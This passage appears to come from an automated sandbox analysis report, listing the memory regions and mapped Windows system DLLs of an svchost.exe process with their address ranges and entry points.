= 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2337 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2338 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2339 start_va = 0x7fffffda000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2340 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2341 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2342 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 2343 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2344 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2345 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2346 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2347 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2348 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2349 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2350 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2351 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2352 start_va = 0x1f0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2353 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2354 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2355 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2356 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2357 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2358 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2359 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2360 start_va = 0x530000 end_va = 0x6b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2361 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2362 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2363 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2364 start_va = 0x1f0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2365 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 2366 start_va = 0x6c0000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2367 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2368 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2369 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2370 start_va = 0xe0000 end_va = 0x15cfff monitored = 0 entry_point = 0xecec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2371 start_va = 0xe0000 end_va = 0x15cfff monitored = 0 entry_point = 0xecec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2372 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2373 start_va = 0x990000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2374 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2375 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2383 start_va = 0xa40000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2384 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2385 start_va = 0xb10000 end_va = 0xb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 2386 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2387 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2388 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2389 start_va = 0xc20000 end_va = 0xeeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2443 start_va = 0x7fefc2c0000 end_va = 0x7fefc36bfff monitored = 0 entry_point = 0x7fefc2d6acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2444 start_va = 0x7fefc290000 end_va = 0x7fefc2bbfff monitored = 0 entry_point = 0x7fefc2915c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2445 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2446 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2447 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2448 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2450 start_va = 0x7fefc240000 end_va = 0x7fefc28afff monitored = 0 entry_point = 0x7fefc24efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2453 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2454 start_va = 0x7fefc390000 end_va = 0x7fefc398fff monitored = 0 entry_point = 0x7fefc391010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2455 start_va = 0xe0000 end_va = 0xecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2458 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2459 start_va = 0x8e0000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2460 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2461 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2462 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2463 start_va = 0xff0000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2464 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2465 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2466 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2467 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2468 start_va = 0xf70000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 2469 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2501 start_va = 0x10c0000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2502 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2503 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2504 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2667 start_va = 0x1250000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2668 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2808 start_va = 0x8b0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2809 start_va = 0x7fefb780000 end_va = 0x7fefb82bfff monitored = 0 entry_point = 0x7fefb7918d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 2810 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2818 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2819 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2826 start_va = 0x7fefcc10000 end_va = 0x7fefcc1cfff monitored = 0 entry_point = 0x7fefcc11348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2828 start_va = 0x7fefb660000 end_va = 0x7fefb68ffff monitored = 0 entry_point = 0x7fefb67fe98 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 2829 start_va = 0x7fefd420000 end_va = 0x7fefd44efff monitored = 0 entry_point = 0x7fefd421064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2845 start_va = 0xef0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2846 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 2847 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 2848 start_va = 0x7fefb4f0000 end_va = 0x7fefb616fff monitored = 0 entry_point = 0x7fefb4f10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2849 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2850 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2851 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2878 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2896 start_va = 0x7fefb480000 end_va = 0x7fefb4bcfff monitored = 0 entry_point = 0x7fefb481b7c region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 2927 start_va = 0x130000 end_va = 0x131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2928 start_va = 0x7fefc3f0000 end_va = 0x7fefc5e3fff monitored = 0 entry_point = 0x7fefc57c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2929 start_va = 0x140000 end_va = 0x140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2932 start_va = 0x150000 end_va = 0x151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2933 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2934 start_va = 0x2c0000 end_va = 0x304fff monitored = 0 entry_point = 0x2c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2935 start_va = 0x2c0000 end_va = 0x304fff monitored = 0 entry_point = 0x2c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2936 start_va = 0x2c0000 end_va = 0x304fff monitored = 0 entry_point = 0x2c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2937 start_va = 0x2c0000 end_va = 0x304fff monitored = 0 entry_point = 0x2c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2938 start_va = 0x2c0000 end_va = 0x304fff monitored = 0 entry_point = 0x2c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2939 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2940 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2946 start_va = 0x1160000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2947 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2952 start_va = 0x1490000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 2953 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2954 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2955 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2956 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2968 start_va = 0x15d0000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 2969 start_va = 0x17c0000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 2970 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2971 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3178 start_va = 0x1740000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 3179 start_va = 0x7fefb370000 end_va = 0x7fefb37ffff monitored = 0 entry_point = 0x7fefb3727f0 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 3180 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3417 start_va = 0x16c0000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 3418 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3419 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3420 start_va = 0x1a30000 end_va = 0x1aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 3421 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4157 start_va = 0x1960000 end_va = 0x19dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 4158 start_va = 0x7fef8e20000 end_va = 0x7fef8e52fff monitored = 0 entry_point = 0x7fef8e2101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 4165 start_va = 0x7fef8ce0000 end_va = 0x7fef8d36fff monitored = 0 entry_point = 0x7fef8ce1118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 4174 start_va = 0x1a50000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 4175 start_va = 0x7fef8cc0000 end_va = 0x7fef8cd1fff monitored = 0 entry_point = 0x7fef8cc1050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 4176 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4186 start_va = 0x74310000 end_va = 0x74312fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 4193 start_va = 0x7fef8b60000 end_va = 0x7fef8b6ffff monitored = 0 entry_point = 0x7fef8b61010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 4195 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4196 start_va = 0x7fefd4a0000 end_va = 0x7fefd50cfff monitored = 0 entry_point = 0x7fefd4a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4200 start_va = 0x7fef8a40000 end_va = 0x7fef8a61fff monitored = 0 entry_point = 0x7fef8a41020 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 4201 start_va = 0x2c0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4202 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 4203 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 4204 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 4205 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4206 start_va = 0x1840000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 4526 start_va = 0x1af0000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 4527 start_va = 0x1b80000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 4528 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 4537 start_va = 0x7fef7a00000 end_va = 0x7fef7a20fff monitored = 0 entry_point = 0x7fef7a0105c region_type = mapped_file name = "wpdbusenum.dll" filename = "\\Windows\\System32\\wpdbusenum.dll" (normalized: "c:\\windows\\system32\\wpdbusenum.dll") Region: id = 4575 start_va = 0x7fef7a30000 end_va = 0x7fef7a48fff monitored = 0 entry_point = 0x7fef7a32b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4576 start_va = 0x19b0000 end_va = 0x1a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 4577 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 4602 start_va = 0x7fef7710000 end_va = 0x7fef77ccfff monitored = 0 entry_point = 0x7fef7711ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: 